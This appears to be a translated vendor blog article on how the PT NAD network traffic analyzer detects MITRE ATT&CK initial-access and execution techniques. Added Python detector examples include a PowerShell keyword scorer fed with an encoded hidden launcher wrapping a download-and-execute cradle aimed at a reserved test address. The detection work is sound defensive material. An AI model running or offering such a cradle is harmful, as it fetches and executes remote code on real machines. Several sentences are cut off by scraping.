Suppose you already have a working SIEM that collects logs and analyzes events, and antivirus software is installed on the endpoints. However,
There are two kinds of NTA systems: some work with NetFlow, others analyze raw traffic. The advantage of the second kind is that it can store raw traffic records. Thanks to this, an information security specialist can verify whether an attack succeeded, localize the threat, understand how the attack happened and how to prevent similar attacks in the future.
We will show how, using NTA, direct or indirect evidence can be used to identify all the known attack tactics described in the knowledge base.
About the ATT&CK knowledge base
MITRE ATT&CK is a public knowledge base developed and maintained by the MITRE Corporation on the basis of analysis of real-world APTs. It is a structured set of tactics and techniques used by attackers. This allows information security specialists all over the world to speak the same language. The database keeps growing and is supplemented with new knowledge.
The knowledge base identifies 12 tactics, corresponding to the stages of a cyber attack:
- initial access;
- execution;
- persistence;
- privilege escalation;
- defense evasion;
- credential access;
- discovery;
- lateral movement (movement inside the perimeter);
- collection;
- command and control;
- exfiltration;
- impact.
For each tactic, the ATT&CK knowledge base lists the techniques that help attackers achieve their goal at the current stage of the attack. Since the same technique can be used at different stages, it can belong to several tactics.
The description of each technique includes:
- an identifier;
- the list of tactics in which it is used;
- examples of its use by APT groups;
- measures to mitigate the damage from its use;
- detection recommendations.
Information security specialists can use the knowledge base to structure information about current attack methods and, with that in mind, build an effective defense system. Understanding how real APT groups operate can also be a source of hypotheses for proactively hunting threats inside the network (threat hunting).
About PT Network Attack Discovery
We will detect the use of techniques from the ATT&CK matrix using the system
The system detects attacks that use ATT&CK techniques by means of detection rules created by the team
Here is the full mapping of PT NAD to the MITRE ATT&CK matrix. The image is large, so we suggest viewing it in a separate window.
Initial access
Initial access tactics cover the techniques for penetrating the company's network. The attackers' goal at this stage is to deliver malicious code to the attacked system and to make sure it can be executed again later.
Traffic analysis in PT NAD reveals seven techniques for gaining initial access:
1. T1189: drive-by compromise
A technique in which the victim opens a website that attackers use to exploit the web browser and obtain application access tokens.
What does PT NAD do?: If web traffic is not encrypted, PT NAD inspects the contents of HTTP server responses. These responses contain the exploits that let attackers execute arbitrary code inside the browser. PT NAD detects such exploits automatically using detection rules.
In addition, PT NAD detects the threat one step earlier. Rules and indicators of compromise are triggered if the user visited a site that redirected them to a site hosting an exploit kit.
2. T1190: exploit public-facing application
Exploitation of vulnerabilities in services reachable from the Internet.
What does PT NAD do?: Performs deep inspection of the contents of network packets, identifying signs of anomalous activity. In particular, there are rules for detecting attacks on major content management systems (CMS), on the web interfaces of network equipment, and on mail and FTP servers.
3. T1133: external remote services
Attackers use remote access services to connect to internal network resources from outside.
What does PT NAD do?: since the system recognizes protocols by packet contents rather than by port numbers, its users can filter traffic to find all sessions of remote access protocols and check whether they are legitimate.
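To illustrate the point about recognizing protocols by payload rather than by port, here is a small Python detector added to this article. It is not PT NAD code and says nothing about how the product implements protocol recognition; the handful of signatures, the session records and the IP addresses are constructed for the example. It classifies each session by its first payload bytes and lists the remote-access sessions, marking those that run on a non-standard port, which is exactly what a port-based filter would miss:

```python
import re

# Protocols this example treats as remote access, with their usual server ports.
# Only used to flag a mismatch; classification itself never looks at the port.
REMOTE_ACCESS_PORTS = {"ssh": {22}, "rdp": {3389}, "vnc": {5900, 5901}}

HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r\n")


def identify_protocol(payload: bytes) -> str:
    """Classify a session from the first payload bytes seen in either direction."""
    if payload.startswith(b"SSH-"):
        return "ssh"
    if payload.startswith(b"RFB "):  # RFB/VNC version banner, e.g. "RFB 003.008\n"
        return "vnc"
    if HTTP_REQUEST.match(payload):
        return "http"
    # TLS record header: content type 0x16 (handshake), version bytes 0x03 0x00..0x04
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04:
        return "tls"
    # RDP: TPKT header (0x03 0x00 + 16-bit length) carrying an X.224 Connection Request (0xE0)
    if len(payload) >= 6 and payload[0] == 0x03 and payload[1] == 0x00 and payload[5] == 0xE0:
        return "rdp"
    return "unknown"


def remote_access_sessions(sessions):
    """Return the sessions that carry a remote-access protocol, whatever the port."""
    findings = []
    for src, dst, port, payload in sessions:
        proto = identify_protocol(payload)
        if proto not in REMOTE_ACCESS_PORTS:
            continue
        findings.append({
            "src": src, "dst": dst, "port": port, "protocol": proto,
            # True when the protocol is tunnelled over a port nobody would filter on
            "unexpected_port": port not in REMOTE_ACCESS_PORTS[proto],
        })
    return findings


# Constructed sessions: (client, server, server port, first payload bytes)
SESSIONS = [
    ("10.0.0.5", "203.0.113.10", 22, b"SSH-2.0-OpenSSH_8.4\r\n"),
    ("10.0.0.7", "203.0.113.20", 443, b"SSH-2.0-dropbear\r\n"),
    ("10.0.0.9", "203.0.113.30", 8080, b"RFB 003.008\n"),
    ("10.0.0.5", "198.51.100.1", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),
    ("10.0.0.11", "203.0.113.40", 80, b"GET / HTTP/1.1\r\nHost: example.net\r\n\r\n"),
    ("10.0.0.12", "203.0.113.50", 53, b"\x03\x00\x00\x2f\x2a\xe0\x00\x00\x00\x00\x00"),
]

if __name__ == "__main__":
    for finding in remote_access_sessions(SESSIONS):
        print(finding)
```

Run as a script it prints four findings: the SSH session on port 22 is expected, while SSH on 443, VNC on 8080 and RDP on 53 are the ones an analyst would review for legitimacy.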
4. T1193: spearphishing attachment
This is the notorious sending of phishing attachments by email.
What does PT NAD do?: Automatically extracts files from traffic and checks them against indicators of compromise. Executable files in email attachments are detected by rules that analyze the contents of mail traffic. In a corporate environment, such attachments are considered anomalous.
5. T1192: spearphishing link
Using phishing links. The technique involves attackers sending a phishing email with a link that, when clicked, downloads a malicious program. As a rule, the link is accompanied by text written according to all the rules of social engineering.
What does PT NAD do?: Detects phishing links using indicators of compromise. For example, in the PT NAD interface we see a session in which there was an HTTP connection via a link included in the list of phishing addresses (phishing-urls).
Connection via a link from the list of phishing indicators
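The matching of observed HTTP requests against a phishing-URL list looks simple, but the comparison only works when both sides are normalized the same way (case of the host, default port, fragment). The Python snippet below is an added example for this article, not PT NAD code; the indicator list, the reserved .example host names and the session records are all constructed. It shows an exact-URL match surviving a differently-cased host with an explicit ":80", a domain-level match on a subdomain, and a near miss where the indicator carries a port the session does not:

```python
from urllib.parse import urlsplit, urlunsplit


def normalize_url(url: str) -> str:
    """Canonical form so that trivial variations of one address compare equal."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower().rstrip(".")
    default_port = {"http": 80, "https": 443}.get(scheme)
    port = parts.port
    netloc = host if port in (None, default_port) else f"{host}:{port}"
    path = parts.path or "/"
    # The fragment never reaches the server, so it is dropped from the comparison
    return urlunsplit((scheme, netloc, path, parts.query, ""))


# Constructed indicator lists; a real feed would be far larger
PHISHING_URLS = {normalize_url(u) for u in [
    "HTTP://login-update.example/verify/index.php",
    "https://secure-docs.example:8443/open",
]}
PHISHING_DOMAINS = {"bad-mail.example"}


def match_http_session(scheme: str, host_header: str, request_uri: str):
    """Rebuild the requested URL from the HTTP session fields and look it up."""
    url = normalize_url(f"{scheme}://{host_header}{request_uri}")
    host = urlsplit(url).hostname or ""
    if url in PHISHING_URLS:
        return ("phishing-url", url)
    for domain in PHISHING_DOMAINS:
        # Match the domain itself and any subdomain, but not look-alikes such as notbad-mail.example
        if host == domain or host.endswith("." + domain):
            return ("phishing-domain", domain)
    return None


# Constructed sessions: (scheme, Host header as sent, request URI as sent)
SESSIONS = [
    ("http", "Login-Update.EXAMPLE:80", "/verify/index.php#ref"),
    ("https", "mail.bad-mail.example", "/inbox?id=4"),
    ("http", "example.net", "/"),
    ("https", "secure-docs.example", "/open"),
]

if __name__ == "__main__":
    for session in SESSIONS:
        print(session, "->", match_http_session(*session))
```

The last session is deliberately a non-match: the indicator names port 8443 and the session went to 443, so an analyst tuning indicators has to decide whether the feed should carry the port at all.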
6. T1199: trusted relationship
Access to the victim's network through third parties with whom the victim has a trusted relationship. Attackers can compromise a trusted organization and connect to the target network through it. To do so, they use VPN connections or domain trusts, which can be identified through traffic analysis.
What does PT NAD do?: parses application-layer protocols and stores the parsed fields in the database, so that the information security analyst can use filters to find all suspicious VPN connections or cross-domain connections in the database.
7. T1078: valid accounts
Using standard, local or domain credentials to authenticate to external and internal services.
What does PT NAD do?: Automatically extracts credentials from the HTTP, FTP, SMTP, POP3, IMAP, SMB, DCE/RPC, SOCKS5, LDAP and Kerberos protocols. As a rule, these are the login, the password and an indication of successful authentication. Where they were used, they are shown in the card of the corresponding session.
Execution
Execution tactics cover the techniques attackers use to run code on compromised systems. Running malicious code helps attackers establish a foothold (the persistence tactic) and extend their access to remote systems on the network by moving inside the perimeter.
PT NAD detects the use of 14 techniques that attackers employ to execute malicious code.
1. T1191: CMSTP (Microsoft Connection Manager Profile Installer)
A technique in which attackers prepare a special malicious INF installation file for the built-in Windows utility CMSTP.exe (Connection Manager Profile Installer). CMSTP.exe takes the file as a parameter and installs the service profile for a remote connection. As a result, CMSTP.exe can be used to load and execute dynamic link libraries (*.dll) or scriptlets (*.sct) from remote servers.
What does PT NAD do?: Automatically detects the transfer of special types of INF files in HTTP traffic. In addition, it detects the HTTP transfer of malicious scriptlets and dynamic link libraries from a remote server.
2. T1059: command-line interface
Interaction with the command-line interface. The command-line interface can be used locally or remotely, for example through remote access utilities.
What does PT NAD do?: automatically detects the presence of shells from the responses to commands that launch various command-line utilities, such as ping or ifconfig.
3. T1175: component object model and distributed COM
Using COM or DCOM technology to execute code on local or remote systems while moving across the network.
What does PT NAD do?: Detects suspicious DCOM calls that attackers commonly use to launch programs.
4. T1203: exploitation for client execution
Exploitation of vulnerabilities to execute arbitrary code on a workstation. The most useful exploits for attackers are those that allow code to run on a remote system, since they can give the attackers access to that system. The technique can be carried out in the following ways: a malicious mailing, a website with a browser exploit, and remote exploitation of application vulnerabilities.
What does PT NAD do?: When analyzing mail traffic, PT NAD checks it for executable files in attachments. It automatically extracts office documents from emails that may contain exploits. Attempts to exploit vulnerabilities are visible in traffic, and PT NAD detects them automatically.
5. T1170: mshta
Using the mshta.exe utility, which runs Microsoft HTML Applications (HTA) with the .hta extension. Because mshta processes files bypassing the browser's security settings, attackers can use mshta.exe to run malicious HTA, JavaScript or VBScript files.
What does PT NAD do?: .hta files to be executed via mshta are also transmitted over the network, so this can be seen in traffic. PT NAD detects the transfer of such malicious files automatically. It captures the files, and information about them can be viewed in the session card.
6. T1086: PowerShell
Using PowerShell to gather information and execute malicious code.
What does PT NAD do?: When PowerShell is used by remote attackers, PT NAD detects this with rules. It detects the PowerShell language keywords most commonly used in malicious scripts, as well as the transfer of PowerShell scripts over the SMB protocol.
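Keyword-based inspection of PowerShell content has a well-known blind spot: a command passed through -EncodedCommand is Base64 of UTF-16LE text, so none of its keywords are visible to a plain substring search. The Python example below was written for this article (it is not PT NAD's rule logic); the keyword list with its weights is a constructed illustration, and the sample script is a constructed launcher with a constructed TEST-NET address. It scores the outer command line, unpacks the encoded payload and scores that too, so the hidden keywords still count:

```python
import base64
import binascii
import re

# Constructed keyword list: (name, pattern, weight). A production rule set would be
# broader and tuned against the organisation's own legitimate scripts.
SUSPICIOUS = [
    ("encoded_command", r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", 3),
    ("invoke_expression", r"\biex\b|invoke-expression", 3),
    ("download", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", 2),
    ("base64_decode", r"frombase64string", 2),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("no_profile", r"-nop\b|-noprofile", 1),
    ("policy_bypass", r"-ex(?:ecutionpolicy)?\s+bypass", 1),
]

ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    match = ENCODED_ARG.search(text)  # search the original text: Base64 is case-sensitive
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_script(text: str) -> dict:
    """Score a script or command line, recursing into an encoded command if present."""
    lowered = text.lower()
    hits = {name: len(re.findall(pattern, lowered)) for name, pattern, _ in SUSPICIOUS}
    score = sum(weight * hits[name] for name, _, weight in SUSPICIOUS)
    decoded = decode_encoded_command(text)
    inner = analyze_script(decoded) if decoded else None
    if inner:
        score += inner["score"]
    return {
        "score": score,
        "hits": {name: count for name, count in hits.items() if count},
        "decoded": decoded,
        "inner": inner,
    }


# Constructed samples. The inner command is a textbook download cradle used only as
# detector input; the address is from the reserved TEST-NET-3 range.
INNER_COMMAND = "IEX ((New-Object Net.WebClient).DownloadString('http://203.0.113.9/stage.ps1'))"
ENCODED = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()
SAMPLE_SCRIPT = f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"
BENIGN_SCRIPT = "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Sort-Object LastWriteTime"

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        result = analyze_script(script)
        print(name, result["score"], result["hits"], result["decoded"])
```

Without the decoding step the sample would score 6 from the launcher flags alone; with it the two keywords inside the payload add another 5, and that difference is what a detection engineer checks first when a keyword rule stops firing.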
7.
Using the Windows Task Scheduler and other utilities to run programs or scripts automatically at specified times.
What does PT NAD do?: attackers create such tasks, usually remotely, which means those sessions are visible in traffic. PT NAD automatically detects suspicious task creation and modification operations over the ATSVC and ITaskSchedulerService RPC interfaces.
8. T1064: scripting
Running scripts to automate various attacker actions.
What does PT NAD do?: detects the transfer of scripts over the network, that is, before they are even launched. It detects script content in raw traffic and the network transfer of files with extensions belonging to popular scripting languages.
9. T1035: service execution
Launching an executable file, command-line interface commands or a script by interacting with Windows services, such as the Service Control Manager (SCM).
What does PT NAD do?: inspects SMB traffic and detects access to the SCM using rules for creating, modifying and starting a service.
The service execution technique can be carried out with the PSExec remote command execution utility. PT NAD analyzes the SMB protocol and detects the use of PSExec when it uses the PSEXESVC.exe file or the standard PSEXECSVC service name to execute code on a remote machine. The user then needs to review the list of executed commands and the legitimacy of remote command execution on that host.
The attack card in PT NAD shows data on the tactics and techniques used, according to the ATT&CK matrix, so that the user understands which stage of the attack the attackers are at, what goals they are pursuing, and what compensating measures to take.
The rule for the use of the PSExec utility is triggered, which may indicate an attempt to execute commands on a remote machine.
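To make the SCM detection described above concrete, here is an added Python example (written for this article, not PT NAD's rule engine) that runs two kinds of checks over already-parsed Service Control Manager calls: per-call rules on CreateService (the PSEXESVC name or binary, a command interpreter registered as the service binary, a UNC binary path) and a sequence rule that flags a service created and deleted by the same client within a short window, which is the footprint of one-shot remote execution rather than a software installation. The event records, hosts and timestamps are constructed; the field layout of a parsed SVCCTL call is an assumption of the example:

```python
import re

# Interpreters that rarely belong in a service's binary path (constructed list)
INTERPRETER = re.compile(
    r"(^|\\)(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)\.exe\b"
)


def create_service_reasons(service_name: str, binary_path: str):
    """Rule-style checks applied to a single CreateService call."""
    reasons = []
    name = service_name.upper()
    path = (binary_path or "").lower()
    # PSExec installs its helper service under a well-known name and binary
    if name == "PSEXESVC" or path.endswith("psexesvc.exe"):
        reasons.append("psexec_service")
    # A command interpreter as the service binary is a one-shot execution pattern
    if INTERPRETER.search(path):
        reasons.append("interpreter_as_service")
    # Service binary referenced by UNC path instead of a local installation directory
    if "\\\\" in path:
        reasons.append("unc_binary_path")
    return reasons


def analyze_scm_events(events, transient_window=300.0):
    """Apply per-call rules plus a create/delete sequence rule over parsed SVCCTL calls."""
    alerts = []
    created_at = {}
    for ts, client, server, op, service, binary in events:
        key = (client, server, service.upper())
        if op == "CreateServiceW":
            created_at[key] = ts
            reasons = create_service_reasons(service, binary)
        elif op == "DeleteService" and key in created_at and ts - created_at[key] <= transient_window:
            reasons = ["transient_service"]
        else:
            reasons = []
        if reasons:
            alerts.append({"time": ts, "client": client, "server": server,
                           "service": service, "reasons": reasons})
    return alerts


# Constructed records of parsed SVCCTL calls seen over SMB/DCE-RPC:
# (timestamp in seconds, client, server, operation, service name, binary path)
EVENTS = [
    (100.0, "10.0.0.21", "10.0.0.50", "CreateServiceW", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe"),
    (100.2, "10.0.0.21", "10.0.0.50", "StartServiceW", "PSEXESVC", None),
    (104.0, "10.0.0.21", "10.0.0.50", "DeleteService", "PSEXESVC", None),
    (200.0, "10.0.0.30", "10.0.0.50", "CreateServiceW", "Backup Agent", r"C:\Program Files\Backup\agent.exe"),
    (200.5, "10.0.0.30", "10.0.0.50", "StartServiceW", "Backup Agent", None),
    (300.0, "10.0.0.31", "10.0.0.51", "CreateServiceW", "updsvc", r"cmd.exe /c \\10.0.0.31\share\task.bat"),
]

if __name__ == "__main__":
    for alert in analyze_scm_events(EVENTS):
        print(alert)
```

The "Backup Agent" creation produces no alert, which is the point of the sequence rule: a legitimate installation creates and starts a service and leaves it in place, whereas the PSEXESVC service is gone four seconds after it appeared.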
10. T1072: third-party software
A technique in which attackers gain access to remote administration software or an enterprise software deployment system and use it to run malicious code. Examples of such software: SCCM, VNC, TeamViewer, HBSS, Altiris.
Incidentally, this technique is especially relevant given the mass shift to remote work and, as a consequence, the connection of many unprotected home machines over questionable remote access channels.
What does PT NAD do?: automatically detects the activity of such software on the network. For example, rules are triggered by connections over the VNC protocol and by the activity of the EvilVNC Trojan, which covertly installs a VNC server on the victim's host and starts it automatically. PT NAD also automatically detects the TeamViewer protocol, which helps the analyst use a filter to find all such sessions and check whether they are legitimate.
11. T1204: user execution
A technique in which the user runs files that can lead to code execution. This could be, for example, opening an executable file or an office document with a macro.
What does PT NAD do?: sees such files at the transfer stage, before they are launched. Information about them can be examined in the card of the sessions in which they were transferred.
12. T1047: Windows Management Instrumentation
Using the WMI tool, which provides local and remote access to Windows system components. Through WMI, attackers can interact with local and remote systems and perform a variety of tasks, such as gathering information for discovery purposes and launching processes remotely during lateral movement.
What does PT NAD do?: Since interaction with remote systems via WMI is visible in traffic, PT NAD automatically detects network requests to establish WMI sessions and inspects traffic for scripts that use WMI.
13. T1028: Windows Remote Management
Using a Windows service and protocol that allows the user to interact with remote systems.
What does PT NAD do?: Detects network connections established using Windows Remote Management. Such sessions are detected automatically by rules.
14. T1220: XSL (Extensible Stylesheet Language) script processing
The XSL stylesheet markup language is used to describe the processing and rendering of data in XML files. To support complex operations, the XSL standard includes support for embedded scripts in various languages. These languages allow arbitrary code to run, which leads to bypassing of whitelist-based security policies.
What does PT NAD do?: detects the transfer of such files over the network, that is, before they are even launched. It automatically detects XSL files transmitted over the network and files with anomalous XSL markup.
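The two things the previous paragraph says a traffic analyzer can look for, an XSL file that embeds a script block and a file whose markup does not look like a stylesheet at all, are both easy to check once the file has been carved out of traffic. The Python example below is added for this article and is not PT NAD code; the three sample documents are constructed (the embedded JScript function does nothing but return a string). It parses each document, reports whether the root element is an XSLT stylesheet, and counts script elements in non-XSLT namespaces such as the Microsoft msxsl extension, recording the declared script language:

```python
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"


def _split_tag(tag: str):
    """Split an ElementTree tag of the form '{namespace}local' into its parts."""
    if tag.startswith("{"):
        namespace, local = tag[1:].split("}", 1)
        return namespace, local
    return "", tag


def inspect_xsl(document: str) -> dict:
    """Flag XSL documents that embed script blocks or do not look like stylesheets."""
    findings = []
    languages = []
    script_count = 0
    try:
        root = ET.fromstring(document)
    except ET.ParseError:
        # A file with an .xsl extension that is not even well-formed XML is itself anomalous
        return {"findings": ["not_well_formed"], "languages": [], "script_count": 0}

    namespace, local = _split_tag(root.tag)
    if namespace != XSLT_NS or local not in ("stylesheet", "transform"):
        findings.append("unexpected_root")

    for element in root.iter():
        el_ns, el_local = _split_tag(element.tag)
        # XSLT itself defines no <script> element; any <script> here comes from an
        # extension namespace (e.g. urn:schemas-microsoft-com:xslt) and carries code
        if el_local == "script" and el_ns != XSLT_NS:
            script_count += 1
            language = element.get("language")
            if language:
                languages.append(language)
    if script_count:
        findings.append("embedded_script")
    return {"findings": findings, "languages": languages, "script_count": script_count}


# Constructed sample documents
CLEAN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><html><body><xsl:value-of select="/root/title"/></body></html></xsl:template>
</xsl:stylesheet>"""

SCRIPT_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:my-scripts">
  <msxsl:script language="JScript" implements-prefix="user"><![CDATA[
    function greet() { return "hello"; }
  ]]></msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:greet()"/></xsl:template>
</xsl:stylesheet>"""

ODD_XSL = """<?xml version="1.0"?>
<config xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"/></config>"""

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN_XSL), ("script", SCRIPT_XSL), ("odd", ODD_XSL)):
        print(name, inspect_xsl(doc))
```

The check deliberately keys on the element's local name and namespace rather than on the literal prefix msxsl, because a prefix is just a label chosen by whoever wrote the file and can be anything.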
In the next article we will look at how the PT Network Attack Discovery NTA system detects other attacker tactics and techniques in line with MITRE ATT&CK. Stay tuned!
Authors:
- Anton Kutepov, specialist at the PT Expert Security Center, Positive Technologies
- Natalia Kazankova, product marketer, Positive Technologies
Source: www.habr.com